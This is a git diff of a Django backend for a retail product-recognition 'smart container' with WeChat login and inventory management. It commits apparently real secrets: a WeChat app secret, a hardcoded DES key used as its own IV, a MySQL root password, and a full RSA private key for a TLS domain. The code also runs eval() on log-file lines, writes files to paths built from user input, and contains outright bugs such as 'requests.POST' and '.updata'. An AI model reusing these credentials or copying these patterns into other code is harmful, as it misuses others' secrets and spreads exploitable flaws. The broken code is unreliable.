+# Create your views here. + +KEY='mHAxsLYz' #秘钥 +PICTURE_ROOT = '/root/Smart_container/PaddleClas/dataset/retail' + +def des_encrypt(s): + """ + DES 加密 + :param s: 原始字符串 + :return: 加密后字符串,16进制 + """ + secret_key = KEY + iv = secret_key + k = des(secret_key, CBC, iv, pad=None, padmode=PAD_PKCS5) + en = k.encrypt(s, padmode=PAD_PKCS5) + return binascii.b2a_hex(en) + + +def des_descrypt(s): + """ + DES 解密 + :param s: 加密后的字符串,16进制 + :return: 解密后的字符串 + """ + secret_key = KEY + iv = secret_key + k = des(secret_key, CBC, iv, pad=None, padmode=PAD_PKCS5) + de = k.decrypt(binascii.a2b_hex(s), padmode=PAD_PKCS5) + sessionID = de.split('_') + openid = sessionID[0] + return openid + + +def SKexpired(old_sessionID, code): + + s_openid = des_descrypt(old_sessionID) + + appid = "wx433732b2940b7d4c" + secret = "b4e95c5b998cd13ba9d09e077343f2e7" + code2SessionUrl = "https://api.weixin.qq.com/sns/jscode2session?appid={appid}&secret={secret}&js_code={code}&grant_type=authorization_code".format( + appid=appid, secret=secret, code=code) + resp = requests.get(code2SessionUrl) + respDict = resp.json() + s_session_key = respDict.get("session_key") + + s = str(s_openid) + '_' +str(s_session_key) + sessionID = des_encrypt(s) + + models.TUser.objects.filter(openid=s_openid).update(session_key=s_session_key) + + return sessionID + + + +def information(): + container = models.TContainer.objects.all() + + container_all = [] + for i in container: + temp = [] + temp.append(i.number) + temp.append(i.container_name) + temp.append(i.container_price) + temp.append(i.picture_address) + temp.append(i.stock) + container_all.append(temp) + + return container_all + + +def update(): + container_all = information() + os.remove('/root/Smart_container/PaddleClas/dataset/retail/data_update.txt') + + with open('/root/Smart_container/PaddleClas/dataset/retail/data_update.txt','a+',encoding='utf-8') as fh: + + for container_single in container_all: + container_name = container_single[1] + container_address = 
container_single[3] + fh.write(container_address + '\t' + container_name + '\n') + fh.close() + #有问题要修改 + os.system('python3 /root/Smart_container/PaddleClas/deploy/python/build_gallery.py -c /root/Smart_container/PaddleClas/deploy/configs/build_product.yaml -o IndexProcess.data_file="/root/Smart_container/PaddleClas/dataset/retail/data_update.txt" -o IndexProcess.index_dir="/root/Smart_container/PaddleClas/dataset/retail/index_update"') + + + +# 识别模块 +def reference(request): + if request.method == "POST": + sessionID = request.POST.get('sessionID') + isSKexpried = request.POST.get('isSKexpried') + code = request.POST.get('code') + value = request.POST.get('picture') + + res_all = models.TContainer.objects.all() + + if isSKexpried: + sessionID = SKexpired(sessionID, code) + + image_name = base64.b64decode(value) + + image_file = '/root/Smart_container/PaddleClas/dataset/retail/test1.jpg' + with open(image_file, "wb") as fh: + fh.write(image_name) + fh.close() + +### 商品识别 + + rec_docs_list = [] + + price_all = 0.0 + + os.system('python3 /root/Smart_container/PaddleClas/deploy/python/predict_system.py -c /root/Smart_container/PaddleClas/deploy/configs/inference_product.yaml -o Global.use_gpu=False') + + + log_path = '/root/Smart_container/PaddleClas/dataset/log.txt' + + with open(log_path, 'r', encoding='utf8') as F: + + str_result_list = F.readlines() + + + if str_result_list[0] == "Please connect root to upload container's name and it's price!\n": + + rec_deplay_str_all = str_result_list[0] + os.remove(log_path) + return JsonResponse({"state": 'true',"container": rec_deplay_str_all}) + + else: + for str_result in str_result_list: + + price_all = 0 + + rec_docs_price = [] + + dict_result = eval(str_result) + + rec_docs = dict_result['rec_docs'] # 结果 + rec_docs_list.append(rec_docs) + + + + for rec_docs_sig in rec_docs_list: + for res in res_all: + if res.container_name== rec_docs_sig: + rec_price = res.container_price + price_all += float(rec_price) + # 
rec_docs_price.append(res.number) + rec_docs_price.append(rec_docs_sig) + rec_docs_price.append(rec_price) + print("你是傻逼") + print(rec_docs_price) + print("你是傻逼") + + os.remove(log_path) + return JsonResponse({"state": 'true', "container": rec_docs_price, "price_all": price_all, "picture_test":'test1.jpg'}) + else: + return JsonResponse({"state": 'false'}) + + +#登录 + +def login_in(request): + if request.method == "POST": + code = request.POST.get('code') + userinfo = request.POST.get('userinfo') + userinfo = json.loads(userinfo) + s_nickname = userinfo['nickName'] + + appid = "wx433732b2940b7d4c" + secret = "b4e95c5b998cd13ba9d09e077343f2e7" + code2SessionUrl = "https://api.weixin.qq.com/sns/jscode2session?appid={appid}&secret={secret}&js_code={code}&grant_type=authorization_code".format( + appid=appid, secret=secret, code=code) + resp = requests.get(code2SessionUrl) + respDict = resp.json() + s_openid = respDict.get("openid") #需要存入的openid + s_session_key = respDict.get("session_key") #需要存入的session_key + + s = str(s_openid) + '_' +str(s_session_key) + sessionID = des_encrypt(s) + sessionID = str(sessionID) + + old_openid = models.TUser.objects.filter(openid=s_openid) #old_openid是查询数据库中是否有s_openid,无为空 + old_openid = old_openid.values() + if not bool(old_openid): #判断表中是否还有对应openid + s_user = models.TUser(openid = s_openid, nickname = s_nickname, session_key = s_session_key) + s_user.save() + update() + else: + models.TUser.objects.filter(openid=s_openid).update(session_key=s_session_key) #替换session_key + + + return JsonResponse({"sessionID": sessionID}) + + +def record(request): #增加模块 + if request.method == "POST": + sessionID = request.POST.get('sessionID') + isSKexpried = request.POST.get('isSKexpried') + code = request.POST.get('code') + s_container_name = request.POST.get('container_name') #商品名称 str + s_container_price = request.POST.get('container_price') #商品单价 float + s_stock = requests.POST.get('container_stock') #商品库存 int + + picture = 
request.FILES['productimage'] #照片 + + if isSKexpried: + sessionID = SKexpired(sessionID, code) + + value_name = s_container_name + + + p = Pinyin() + name = p.get_pinyin(value_name).replace('-','') + + s_picture_address = 'gallery/'+ name + '.jpg' + + with open(os.path.join(PICTURE_ROOT,s_picture_address), 'wb') as fh: + for chunk in picture.chunks(): + fh.write(chunk) + fh.close() + + last_data = models.TContainer.objects.last() #查询t_container表中最后一条数据,以便于商品录入排序 + if not bool(last_data.number): + s_number = 1 #序号 + else: + s_number = last_data.number + 1 + + old_container = models.TContainer.objects.filter(container_name=s_container_name) + old_container = old_container.values() + + if not bool(old_container): + + s_container = models.TContainer(number=s_number, container_name=s_container_name, container_price=s_container_price, + picture_address=s_picture_address, stock=s_stock) + s_container.save() + update() + return JsonResponse({"state": 'true', "sessionID": sessionID}) + + else: + return JsonResponse({"state": 'true', "sessionID": sessionID}) + else: + return JsonResponse({"state": 'false'}) + + + +def delete(request): #删除模块 + if request.method == "POST": + sessionID = request.POST.get('sessionID') + isSKexpried = request.POST.get('isSKexpried') + code = request.POST.get('code') + d_number = request.POST.get('number') + d_container_name = request.POST.get('container_name') + + value_name = d_container_name + + + p = Pinyin() + name = p.get_pinyin(value_name).replace('-','') + + s_picture_address = os.path.join(PICTURE_ROOT,'gallery/'+ name + '.jpg') + os.remove(s_picture_address) + + if isSKexpried: + sessionID = SKexpired(sessionID, code) + + d_number = int(d_number) + old_container = models.TContainer.objects.filter(number = d_number) #查询t_container表中所有数据,判断表中是否已经包含目标商品 + old_container = old_container.values() + + if not bool(old_container): #表内不含待删除商品 + return JsonResponse({"state": 'false', "sessionID": sessionID}) + else: + 
models.TContainer.objects.filter(number = d_number).delete() + + update() + return JsonResponse({"state": 'true', "sessionID": sessionID}) + + else: + return JsonResponse({"state": 'false'}) + + +def replace(request): #修改模块 + if request.method == "POST": + sessionID = request.POST.get('sessionID') + isSKexpried = request.POST.get('isSKexpried') + code = request.POST.get('code') + number = request.POST.get('number') + r_container_name = request.POST.get('container_name') + r_container_price = request.POST.get('container_price') + r_stock = request.POST.get('container_stock') + isimageRevised = request.POST.get('isimageRevised') + + if isimageRevised == True: + r_picture = request.FILES['productimage'] + p = Pinyin() + name = p.get_pinyin(r_container_name).replace('-','') + s_picture_address = os.path.join(PICTURE_ROOT,'gallery/'+ name + '.jpg') + with open(s_picture_address, 'wb+') as fh: + fh.write(r_picture.read()) + fh.close() + + if isSKexpried: + sessionID = SKexpired(sessionID, code) + + models.TContainer.objects.filter(number=number).update(container_name=r_container_name) + + models.TContainer.objects.filter(number=number).update(container_price=r_container_price) + + models.TContainer.objects.filter(number=number).updata(stock=r_stock) + + update() + return JsonResponse({"state": 'true', "sessionID": sessionID}) + + else: + return JsonResponse({"state": 'false'}) + + +def search(request): #查询模块 + if request.method == "POST": + sessionID = request.POST.get('sessionID') + isSKexpried = request.POST.get('isSKexpried') + code = request.POST.get('code') + + if isSKexpried: + sessionID = SKexpired(sessionID, code) + + container_all = information() + + return JsonResponse({"state": 'true', "sessionID": sessionID, 'container_all': container_all}) + else: + return JsonResponse({"state": 'false'}) + + +def find(request): #检索模块 + if request.method== "POST": + sessionID = request.POST.get('sessionID') + isSKexpried = request.POST.get('isSKexpried') + code = 
request.POST.get('code') + searchtarget = request.POST.get('searchtarget') + + if isSKexpried: + sessionID = SKexpired(sessionID, code) + + container = models.TContainer.objects.all() + + find_result = [] + for i in container: + + value = fuzz.partial_ratio("%s"%searchtarget,i.container_name) + + if value>=80: + temp = [] + temp.append(i.number) + temp.append(i.container_name) + temp.append(i.container_price) + temp.append(i.picture_address) + find_result.append(temp) + + return JsonResponse({"state": 'true', "sessionID": sessionID,"container_all":find_result}) + else: + return JsonResponse({"state": 'false'}) + + +def stock_sale(request): #商品销售 + if request.method == "POST": + sessionID = request.POST.get('sessionID') + isSKexpried = request.POST.get('isSKexpried') + code = request.POST.get('code') + container_sale = request.POST.get('stocksale') + + if isSKexpried: + sessionID = SKexpired(sessionID, code) + + container = models.TContainer.objects.all() + + for i in container_sale: #[['number','stock'],.....] 
+ for j in container: + if j.number == i[0]: + models.TContainer.objects.filter(number=i[0]).update(stock=j.stock - i[1]) + break + return JsonResponse({"state": 'true', "sessionID": sessionID}) + else: + return JsonResponse({"state": 'false'}) + + + +def reference_client(request): + if request.method == 'POST': + req = json.loads(request.body) #将json编码的字符串再转换为python的数据结构 + print('req') + name = req['name'] + img_str = req['image'] #得到unicode的字符串 + img_decode_ = img_str.encode('ascii') #从unicode变成ascii编码 + img_decode = base64.b64decode(img_decode_) #解base64编码,得图片的二进制 + img_np_ = np.frombuffer(img_decode, np.uint8) + img = cv2.imdecode(img_np_, cv2.COLOR_RGB2BGR) #转为opencv格式 + + cv2.imwrite('/root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg', img) #存储路径 + + ### 商品识别 + res_all = models.TContainer.objects.all() + + rec_docs_list = [] + + price_all = 0.0 + + os.system('python3 /root/Smart_container/PaddleClas/deploy/python/predict_client.py -c /root/Smart_container/PaddleClas/deploy/configs/inference_client.yaml -o Global.use_gpu=False') + + + log_path = '/root/Smart_container/PaddleClas/dataset/log_client.txt' + + with open(log_path, 'r', encoding='utf8') as F: + + str_result_list = F.readlines() + # print(str_result_list) + + if str_result_list[0] == "Please connect root to upload container's name and it's price!\n": + + rec_deplay_str_all = str_result_list[0] + os.remove(log_path) + return JsonResponse({"state": 'true',"container": rec_deplay_str_all}) + + else: + + for str_result in str_result_list: + + price_all = 0 + + rec_docs_price = [] + + dict_result = eval(str_result) + + rec_docs = dict_result['rec_docs'] # 结果 + rec_docs_list.append(rec_docs) + + + + for rec_docs_sig in rec_docs_list: + for res in res_all: + if res.container_name== rec_docs_sig: + rec_price = res.container_price + price_all += float(rec_price) + rec_docs_price.append(rec_docs_sig) + rec_docs_price.append(rec_price) + + + os.remove(log_path) + return JsonResponse({"state": 
'true',"container": rec_docs_price,"price_all": price_all,"picture_test":'test_client.jpg'}) + + else: + return JsonResponse({"state": 'false'}) diff --git a/Smart_container/media/2020-11-30-f44ec51b-7709-43eb-b2bf-4b774c10956d-logo.jpg b/Smart_container/media/2020-11-30-f44ec51b-7709-43eb-b2bf-4b774c10956d-logo.jpg deleted file mode 100644 index fa1a25c..0000000 Binary files a/Smart_container/media/2020-11-30-f44ec51b-7709-43eb-b2bf-4b774c10956d-logo.jpg and /dev/null differ diff --git a/Smart_container/media/2020-11-30-fcbe0e2e-3909-4ad5-a5a5-69bc57fbaf9f-funpy.jpeg b/Smart_container/media/2020-11-30-fcbe0e2e-3909-4ad5-a5a5-69bc57fbaf9f-funpy.jpeg deleted file mode 100644 index d1eef18..0000000 Binary files a/Smart_container/media/2020-11-30-fcbe0e2e-3909-4ad5-a5a5-69bc57fbaf9f-funpy.jpeg and /dev/null differ diff --git a/Smart_container/media/funpy.jpeg b/Smart_container/media/funpy.jpeg deleted file mode 100644 index d1eef18..0000000 Binary files a/Smart_container/media/funpy.jpeg and /dev/null differ diff --git a/Smart_container/media/funpy_RRKdE2w.jpeg b/Smart_container/media/funpy_RRKdE2w.jpeg deleted file mode 100644 index d1eef18..0000000 Binary files a/Smart_container/media/funpy_RRKdE2w.jpeg and /dev/null differ diff --git a/Smart_container/media/funpy_dsWgUH7.jpeg b/Smart_container/media/funpy_dsWgUH7.jpeg deleted file mode 100644 index d1eef18..0000000 Binary files a/Smart_container/media/funpy_dsWgUH7.jpeg and /dev/null differ diff --git a/Smart_container/media/logo.jpg b/Smart_container/media/logo.jpg deleted file mode 100644 index fa1a25c..0000000 Binary files a/Smart_container/media/logo.jpg and /dev/null differ diff --git a/Smart_container/media/noImage.png b/Smart_container/media/noImage.png deleted file mode 100644 index 368341c..0000000 Binary files a/Smart_container/media/noImage.png and /dev/null differ diff --git a/Smart_container/output/test1.jpg b/Smart_container/output/test1.jpg index 4c2cda8..db13332 100644 Binary files 
a/Smart_container/output/test1.jpg and b/Smart_container/output/test1.jpg differ diff --git a/Smart_container/output/test_client.jpg b/Smart_container/output/test_client.jpg index 9c11494..2858712 100644 Binary files a/Smart_container/output/test_client.jpg and b/Smart_container/output/test_client.jpg differ diff --git a/Smart_container/ssl/1_thomas-yanxin.com_bundle.crt b/Smart_container/ssl/1_thomas-yanxin.com_bundle.crt new file mode 100644 index 0000000..1a58210 --- /dev/null +++ b/Smart_container/ssl/1_thomas-yanxin.com_bundle.crt @@ -0,0 +1,63 @@ +-----BEGIN CERTIFICATE----- +MIIGJTCCBQ2gAwIBAgIQCECzjwlA2Yj86az0JYrLCDANBgkqhkiG9w0BAQsFADBy +MQswCQYDVQQGEwJDTjElMCMGA1UEChMcVHJ1c3RBc2lhIFRlY2hub2xvZ2llcywg +SW5jLjEdMBsGA1UECxMURG9tYWluIFZhbGlkYXRlZCBTU0wxHTAbBgNVBAMTFFRy +dXN0QXNpYSBUTFMgUlNBIENBMB4XDTIxMTEwODAwMDAwMFoXDTIyMTEwNzIzNTk1 +OVowHDEaMBgGA1UEAxMRdGhvbWFzLXlhbnhpbi5jb20wggEiMA0GCSqGSIb3DQEB +AQUAA4IBDwAwggEKAoIBAQCfWWCt55HSfiwBq1/H7RZxgMHEo1DN+ZspBGq1s7yu +BeFXQKlzLlfBSrwajuYyMZLS7yT/UZGIbJQe62DWsdJYsTt0MICgCPKAsA1Ia31T +ghtb3qoI86Uf2tc9JgHELyK9RyxTZZYmeT/KIYcNp5Lt7W/0ASrKSlPxQ4lxhSVU +Ii7xymADER7/4UlmVadO4xtoNk5G4tjNgaQIZnVw6SeODXNUxF51Lcizoq+k7AgL +TnBfcgCVE+6hKN7uUYM78bqdK9EvEkR6QjpKmNWpYakVESEmG3SVY7t6kSYLN9Yy +7Ee0Fh0CpxkwYKdNfIc5+XTUKU1kxRLct3QVJTEpu6i/AgMBAAGjggMLMIIDBzAf +BgNVHSMEGDAWgBR/05nzoEcOMQBWViKOt8ye3coBijAdBgNVHQ4EFgQUphGL8J1s +l6FYzSDKtCQFjv3F9aMwMwYDVR0RBCwwKoIRdGhvbWFzLXlhbnhpbi5jb22CFXd3 +dy50aG9tYXMteWFueGluLmNvbTAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYI +KwYBBQUHAwEGCCsGAQUFBwMCMD4GA1UdIAQ3MDUwMwYGZ4EMAQIBMCkwJwYIKwYB +BQUHAgEWG2h0dHA6Ly93d3cuZGlnaWNlcnQuY29tL0NQUzCBkgYIKwYBBQUHAQEE +gYUwgYIwNAYIKwYBBQUHMAGGKGh0dHA6Ly9zdGF0dXNlLmRpZ2l0YWxjZXJ0dmFs +aWRhdGlvbi5jb20wSgYIKwYBBQUHMAKGPmh0dHA6Ly9jYWNlcnRzLmRpZ2l0YWxj +ZXJ0dmFsaWRhdGlvbi5jb20vVHJ1c3RBc2lhVExTUlNBQ0EuY3J0MAkGA1UdEwQC +MAAwggF/BgorBgEEAdZ5AgQCBIIBbwSCAWsBaQB3ACl5vvCeOTkh8FZzn2Old+W+ +V32cYAr4+U1dJlwlXceEAAABfP9uAGoAAAQDAEgwRgIhAL8uti2SpGNt1gWZLa7u 
+PBpvR6tXmjji+5GR6B3cM5/lAiEAp7P+6jR8S3jWeqpoQJDzicOhgoAt7mu+kFol +U0/yHgkAdgBRo7D1/QF5nFZtuDd4jwykeswbJ8v3nohCmg3+1IsF5QAAAXz/bgBa +AAAEAwBHMEUCIHwZkmDH6XvhFS4r5vim7rnqpY13h+eD4NJgFLIPS6X8AiEAgaDM +7C4Wpvo+RUupJ9SAj52+nzH7z+DhQMT1pHQ43vgAdgBByMqx3yJGShDGoToJQode +TjGLGwPr60vHaPCQYpYG9gAAAXz/bf/gAAAEAwBHMEUCIGmOVzmDLsfW5GP1DO7n +jSkVtHsdt8YcmzaIrdRap9OiAiEArA1cnJycQ7oYgx52ifcBn/nUU5ma2avKEIug +gzjGHTAwDQYJKoZIhvcNAQELBQADggEBAGB4OuZsjwxwtRDiBWeCUFtvKx52rTr/ +EAUtgX4/LlywjN8EyNvZ1tOP62bKSmzKVp1kq6RosQqLWgZI12Pk+THi7UyIxHe7 +05HM9GtyI5anWBrrcWikCaRQ+u8hO0VIx8Ey2Pw7HES7dUBFm9lt2lhRhqTRiCZv +HIDdVM00vEtLoZzSp0KUoFJ7HCIzfwn04yVBhHyC7cEAXkcKGRoS8rrXNPROwmSu +l34uJZiXIvCeFLrgH2JsoHJOlWS3H4nKyYzpBatsxaf6bkcmXXj1Aec9viGmC6/D +obgNL0oOR7TVaUdZI8SmsNuq2t7/b0LoxFdvlpVz3TnFkwdLSQq5ojM= +-----END CERTIFICATE----- +-----BEGIN CERTIFICATE----- +MIIErjCCA5agAwIBAgIQBYAmfwbylVM0jhwYWl7uLjANBgkqhkiG9w0BAQsFADBh +MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 +d3cuZGlnaWNlcnQuY29tMSAwHgYDVQQDExdEaWdpQ2VydCBHbG9iYWwgUm9vdCBD +QTAeFw0xNzEyMDgxMjI4MjZaFw0yNzEyMDgxMjI4MjZaMHIxCzAJBgNVBAYTAkNO +MSUwIwYDVQQKExxUcnVzdEFzaWEgVGVjaG5vbG9naWVzLCBJbmMuMR0wGwYDVQQL +ExREb21haW4gVmFsaWRhdGVkIFNTTDEdMBsGA1UEAxMUVHJ1c3RBc2lhIFRMUyBS +U0EgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCgWa9X+ph+wAm8 +Yh1Fk1MjKbQ5QwBOOKVaZR/OfCh+F6f93u7vZHGcUU/lvVGgUQnbzJhR1UV2epJa +e+m7cxnXIKdD0/VS9btAgwJszGFvwoqXeaCqFoP71wPmXjjUwLT70+qvX4hdyYfO +JcjeTz5QKtg8zQwxaK9x4JT9CoOmoVdVhEBAiD3DwR5fFgOHDwwGxdJWVBvktnoA +zjdTLXDdbSVC5jZ0u8oq9BiTDv7jAlsB5F8aZgvSZDOQeFrwaOTbKWSEInEhnchK +ZTD1dz6aBlk1xGEI5PZWAnVAba/ofH33ktymaTDsE6xRDnW97pDkimCRak6CEbfe +3dXw6OV5AgMBAAGjggFPMIIBSzAdBgNVHQ4EFgQUf9OZ86BHDjEAVlYijrfMnt3K +AYowHwYDVR0jBBgwFoAUA95QNVbRTLtm8KPiGxvDl7I90VUwDgYDVR0PAQH/BAQD +AgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjASBgNVHRMBAf8ECDAG +AQH/AgEAMDQGCCsGAQUFBwEBBCgwJjAkBggrBgEFBQcwAYYYaHR0cDovL29jc3Au +ZGlnaWNlcnQuY29tMEIGA1UdHwQ7MDkwN6A1oDOGMWh0dHA6Ly9jcmwzLmRpZ2lj 
+ZXJ0LmNvbS9EaWdpQ2VydEdsb2JhbFJvb3RDQS5jcmwwTAYDVR0gBEUwQzA3Bglg +hkgBhv1sAQIwKjAoBggrBgEFBQcCARYcaHR0cHM6Ly93d3cuZGlnaWNlcnQuY29t +L0NQUzAIBgZngQwBAgEwDQYJKoZIhvcNAQELBQADggEBAK3dVOj5dlv4MzK2i233 +lDYvyJ3slFY2X2HKTYGte8nbK6i5/fsDImMYihAkp6VaNY/en8WZ5qcrQPVLuJrJ +DSXT04NnMeZOQDUoj/NHAmdfCBB/h1bZ5OGK6Sf1h5Yx/5wR4f3TUoPgGlnU7EuP +ISLNdMRiDrXntcImDAiRvkh5GJuH4YCVE6XEntqaNIgGkRwxKSgnU3Id3iuFbW9F +UQ9Qqtb1GX91AJ7i4153TikGgYCdwYkBURD8gSVe8OAco6IfZOYt/TEwii1Ivi1C +qnuUlWpsF1LdQNIdfbW3TSe0BhQa7ifbVIfvPWHYOu3rkg1ZeMo6XRU9B4n5VyJY +RmE= +-----END CERTIFICATE----- diff --git a/Smart_container/ssl/2_thomas-yanxin.com.key b/Smart_container/ssl/2_thomas-yanxin.com.key new file mode 100644 index 0000000..289ba23 --- /dev/null +++ b/Smart_container/ssl/2_thomas-yanxin.com.key @@ -0,0 +1,27 @@ +-----BEGIN RSA PRIVATE KEY----- +MIIEowIBAAKCAQEAn1lgreeR0n4sAatfx+0WcYDBxKNQzfmbKQRqtbO8rgXhV0Cp +cy5XwUq8Go7mMjGS0u8k/1GRiGyUHutg1rHSWLE7dDCAoAjygLANSGt9U4IbW96q +CPOlH9rXPSYBxC8ivUcsU2WWJnk/yiGHDaeS7e1v9AEqykpT8UOJcYUlVCIu8cpg +AxEe/+FJZlWnTuMbaDZORuLYzYGkCGZ1cOknjg1zVMRedS3Is6KvpOwIC05wX3IA +lRPuoSje7lGDO/G6nSvRLxJEekI6SpjVqWGpFREhJht0lWO7epEmCzfWMuxHtBYd +AqcZMGCnTXyHOfl01ClNZMUS3Ld0FSUxKbuovwIDAQABAoIBAAvKj9Jeg9ZZGsWG +2mAPZa1Bc1UrJpQPR9F5r7HBWpFgAwQzVzacM8csUg3/C/6j13L/WjQAY63+JtnA +3hoU73U7rCQVYLc24kbugBUfSxdOVdru95MRAGOCjJHMSa4sNLxf02JabolrSHKb +F4TFpSQxAStDmNh+NobwUe/SA+idPv/vs1D9VmIhYdlumwc4A2zZoxsLtC22ujqo +EBXXUUBS4NBj4EPSh5G/0I0cOg7TbGPrnk7TsTDAbyhdzJxdw7qep+xbeRHe3IUe +qol3Ds5FDRMjd9jlbnCkmkPvmlTM5V/MrriuxTmFLgflOPasQpHWgzjdhnV3vbmg ++FlXIY0CgYEA1Ra7PMV3ZKfiLQD9TDI3lipS7f+NSvYy6KUWFKdTO5XNkemhJG6a +CwBydh0M+uxlSsVSQuIxAg/auNhe9tiU9NGuBb7forZ8q35f9ZrUUlK4UUcMDAAR +NfyiN+JGj1hDte7pB5vAXF7rENpvq4C9Ecav4kwkcbBVFgWvCwaSolMCgYEAv3A6 +6aoMGhQESQnqxKV4acW1+tyGnAut3FWZjqPEegsxpYqrQW6bzAs4Vp8VcP6hm0Ae +Tbx+dz9DwQ7nA+TBMtYpK/ZQRtgSm+qyrWzhheHlWCmRzEhJ32n6EtihjSXRZHeM +Bf6kwZtNi2mdMNMre03R1i9dztzSHIegEIfAKmUCgYEAyM7jJCHyoaiUPFTyXxvz 
+xk+cVyy8uifJUfRBGrWUelJxp0/Dy9Fu2W9Sbnxx/wVHb28EVoNSK99E/2zoETeJ +KC1xEXkOxwex9OrjA1ElRW8uw2lwsN5fWcD6Hi/ezrcfGBRNBh6A6IuKehdfpP9t +LZNPrLKUpY7GoDo6+uj2xoECgYAz7kvs6vYRdPCcp5YJ9iEuADYXcQ8K8ZgeNxJK +wV4hBTxYfb9rJogY18pWpRz54/kO1lviFonv6zeD/Xjpc3p9Qd81T8IDFcYmiYoi +xXCAEwFV4yDr24g+lM8DocRhN6sPp+ZSEfu7kVd9xA6iGgankjqj8YFvBjPxDVF8 +anbUiQKBgHokybzgfFSAGfg6RJ8WcHwdgF03NPnky4HGYyhywqXD1jq0UZiRH5Tz +pIfTm6PIR2fZRGD5PUPYY3U/UaGPiLljsCkbM2Dq0fe3cg9J8OdSk+LZbz9xXCvI +yAsuGc3RD5Z3QobMgBRxCJdq/c1b4lnjiiwNdNtBt2cJ9RE7QJXO +-----END RSA PRIVATE KEY----- \ No newline at end of file diff --git a/Smart_container/stock_up.py b/Smart_container/stock_up.py new file mode 100644 index 0000000..d59b180 --- /dev/null +++ b/Smart_container/stock_up.py @@ -0,0 +1,21 @@ +import pymysql +import random + +db = pymysql.connect(host="localhost", user="root", passwd="105316", db="container") +print('数据库连接成功!') +cur = db.cursor() +sql = "select * from t_container" +cur.execute(sql) +result=cur.fetchall() +for row in result: + sqlQuery = "UPDATE t_container SET stock = %s WHERE number = %s" + value = (random.randint(1000, 5000), row[0]) + cur.execute(sqlQuery, value) + + +db.commit() +cur.close() +db.close() + +print("============") +print("Done! ") \ No newline at end of file diff --git a/requirements.txt b/requirements.txt index 0177005..3c1741e 100644 --- a/requirements.txt +++ b/requirements.txt @@ -18,5 +18,4 @@ setuptools==45.2.0 six==1.14.0 tqdm==4.62.3 visualdl==2.2.0 -xpinyin==0.7.6 -qpt>=1.0a7 +xpinyin==0.7.6 \ No newline at end of file